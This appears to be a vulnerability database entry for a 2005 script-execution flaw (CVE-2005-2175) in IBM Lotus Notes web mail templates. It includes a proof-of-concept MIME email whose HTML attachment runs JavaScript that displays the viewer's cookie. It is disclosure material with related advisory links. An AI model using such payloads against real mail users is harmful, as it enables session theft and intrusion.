Lucene search
HistoryJul 06, 2005 - 12:00 a.m.
IBM Lotus Domino Notes 6.0/6.5 - Mail Template Automatic Script Execution
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/14164/info
IBM Lotus Notes email client is prone to an input validation vulnerability. Reports indicate that HTML and JavaScript attached to received email messages is executed automatically when the email message is viewed. Specifically, users accessing standard Notes mail templates through a Web mail client are affected.
This vulnerability may be leveraged by a remote attacker to automatically execute arbitrary script code in the context of a target user.
Content-Transfer-Encoding: 8bit
Content-Type: multipart/mixed; boundary="0-1940165274-1120658611=:34349"
--0-1940165274-1120658611=:34349
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Id:
Content-Transfer-Encoding: quoted-printable
read it
=09
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=20
--0-1940165274-1120658611=:34349
Content-Type: text/html; name="malxxx.html"
Content-Disposition: inline; filename="malxxx.html"
Content-Description: 268262132-malxxx.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<title>Test XSS of uploaded documents</title>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
</HEAD>
<BODY>
<SCRIPT>
document.write('The cookie is:<br> ' + document.cookie + '<p>');
</SCRIPT>
</BODY></HTML>
--0-1940165274-1120658611=:34349--Related
checkpoint_advisories
checkpoint_advisories
IBM Lotus Notes Cross Site Scripting (CVE-2005-2175)
2009-10-22 00:00:00
nvd
nvd
CVE-2005-2175
2005-07-09 04:00:00
cve
cve
CVE-2005-2175
2005-07-09 04:00:00
cvelist
cvelist
CVE-2005-2175
2005-07-09 04:00:00